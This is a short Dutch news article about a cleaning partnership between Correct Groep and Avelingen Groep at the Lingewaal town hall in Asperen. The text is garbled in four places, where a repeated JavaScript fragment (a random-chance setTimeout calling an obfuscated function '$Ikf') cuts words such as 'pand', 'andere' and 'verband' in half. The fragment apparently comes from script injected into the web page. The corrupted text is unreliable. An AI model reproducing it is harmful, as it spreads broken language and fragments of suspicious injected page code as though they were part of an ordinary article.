Correct Groep breidt samenwerking Lingewaal uit

Bezoekers en medewerkers van de gemeente Lingewaal kunnen op het gemeentehuis verzekerd zijn van een schoon toilet. Schoonmakers van Correct Groep en Avelingen Groep maken gezamenlijk het statige pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and aan het Raadhuisplein in Asperen schoon. De gemeente Lingewaal investeert graag in de samenleving. Dat doet zij onder andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere door ‘sociaal aan te besteden’.
Naast het schoonhouden van de sanitaire ruimtes, worden ook de kantoor- en openbare ruimtes van het gemeentehuis schoongehouden. Tevens maakt het schoonmaakteam twee sportaccommodaties in Heukelum en Herwijnen schoon.
De schoonmaakmedewerkers zijn erg enthousiast. In de eerste plaats omdat zij kunnen laten zien wat zij geleerd hebben en in de tweede plaats omdat zij het monumentale pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and mogen schoonmaken. Als werk-leerbedrijf biedt Correct Groep mensen mogelijkheden zichzelf te ontwikkelen. Hierdoor heeft men meer kansen op de arbeidsmarkt.
Correct Groep heeft een samenwerkingsverbandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and met Avelingen Groep. Deze samenwerking heeft als doel samen opdrachtgevers op maat te bedienen.